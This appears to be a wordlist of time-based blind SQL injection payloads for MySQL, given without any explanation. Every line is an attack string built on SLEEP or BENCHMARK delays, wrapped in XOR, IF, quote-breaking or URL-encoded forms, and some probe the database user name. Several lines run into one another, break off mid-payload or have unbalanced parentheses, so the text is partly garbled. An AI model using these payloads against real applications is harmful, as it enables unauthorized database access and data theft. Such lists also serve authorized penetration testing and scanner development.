*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(10))%2b'
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10)),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
"XOR(if((select/**/666/**/where/**/1=1),444,0))XOR"
"XOR(if((select/**/666/**/where/**/1=2),444,0))XOR"
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10)),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
0'or(now()=sysdate()&&SLEEP(10))or'Zif(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/if(now()=s>(SELECT(0)FROM(SELECT(SLEEP(8)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
(select*from(select(sleep(10)))a)
'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(10) ELSE 0 END)XOR'Z
1'%2b(select*from(select(sleep(10)))a)%2b'
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(10))A))(SELECT * FROM (SELECT(SLEEP(10)))YYYY)(SELECT * FROM (SELECT(SLEEP(10)))Y>'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&category=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&city=0%27XOR(i>
